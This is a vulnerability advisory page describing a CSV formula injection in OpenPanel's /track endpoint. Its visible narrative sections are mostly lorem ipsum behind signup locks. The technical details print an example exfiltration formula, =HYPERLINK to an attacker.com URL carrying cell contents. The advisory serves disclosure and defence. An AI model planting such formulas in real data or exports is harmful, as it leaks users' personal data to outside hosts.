Sceawere

Vulnerability Detail

CVE-2026-108579UPDATED Verified Sceawere Triage Sources: NVD / CISA KEV

OpenPanel CSV Formula Injection Vulnerability

Vulnerability Metadata

Severity
Medium
Score / CVSS
4.2
Creation Date
2h ago
Vendor
Openpanel-dev
Product
openpanel
Attack Type
Improper Neutralization of Formula Elements in a CSV File
Vector String
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N
Attack Complexity
HIGH

Narrative and Response

Description

OpenPanel through 2.3.0 contains a CSV formula injection vulnerability that allows unauthenticated attackers to embed spreadsheet formulas by supplying crafted profile IDs to the /track endpoint. Attackers can send tracking events with profile IDs like =HYPERLINK(...) matching a cohort, so exported cohort CSVs execute formulas that exfiltrate adjacent cell data.

Executive Summary

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.

Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.

Executive Summary Locked

Sign up to unlock professional threat analysis, mitigations, and indicator signatures.

Technical Details

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.

Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.

Detailed Technical Analysis Locked

Sign up to unlock professional threat analysis, mitigations, and indicator signatures.

Mitigations

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.

Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.

Remediation & Mitigations Locked

Sign up to unlock professional threat analysis, mitigations, and indicator signatures.

References

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.

Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.

Intelligence References Locked

Sign up to unlock professional threat analysis, mitigations, and indicator signatures.

Additional Metadata

{
  "score": "4.2",
  "pubDate": "2026-10-10T16:16:31.080Z",
  "pubdate": "2026-10-10T16:16:31.080Z",
  "executiveSummary": "OpenPanel versions through 2.3.0 are susceptible to a CSV formula injection vulnerability within the /track endpoint. This vulnerability allows an unauthenticated attacker to inject malicious spreadsheet formulas into user-supplied profile IDs.\nThe primary risk involves the compromise of data integrity and confidentiality when administrators or users export cohort data to CSV files. When these files are opened in spreadsheet software like Microsoft Excel or LibreOffice Calc, the embedded formulas are automatically parsed and executed by the application.\nThis flaw enables attackers to exfiltrate sensitive information from adjacent cells or initiate external requests, effectively leveraging the trusted context of the exported reports to facilitate data exfiltration or unauthorized system interaction. The vulnerability is exploitable by any unauthenticated remote attacker capable of sending tracking events to the application, requiring no prior system access or administrative privileges to execute the injection.",
  "technicalDetails": "The vulnerability resides in the application's handling of user-controllable input during the processing of tracking events via the /track endpoint. The application fails to perform adequate input sanitization or output encoding on profile IDs before storing them in the database or including them in generated CSV exports.\nRoot Cause: The root cause is the lack of proper validation and neutralization of special characters that carry semantic meaning in spreadsheet applications. Specifically, characters such as the equals sign (=), plus (+), minus (-), or at sign (@) at the beginning of a data field can trigger formula execution when the CSV is interpreted by common spreadsheet software.\nAttack Flow: An attacker sends a specially crafted POST or GET request to the /track endpoint, providing a payload in the profile ID field that utilizes spreadsheet functions, such as =HYPERLINK('http://attacker.com/steal?data='&CELL('contents',A1)). Because the application processes this input without filtering, the malicious string is persisted in the cohort records.\nExploitation: When a privileged user or administrator subsequently exports the affected cohort data via the OpenPanel dashboard, the application generates a CSV file containing the malicious payload. Upon opening this file, the spreadsheet application parses the field as a formula rather than plain text. This triggers the execution of the embedded function, such as HYPERLINK, which can cause the spreadsheet application to automatically reach out to an external server controlled by the attacker, effectively transmitting the contents of adjacent cells (which may contain PII or other sensitive cohort information) as parameters within the URL request.\nThe impact is significant because the execution occurs on the client side, within the context of the user's spreadsheet application, bypassing server-side security controls. This facilitates data exfiltration and potential remote command execution depending on the specific spreadsheet software configuration and the sophistication of the injected formula."
}
CVE-2026-108579: OpenPanel CSV Formula Injection Vulnerability (MEDIUM Severity, CVSS: 4.2) | Sceawere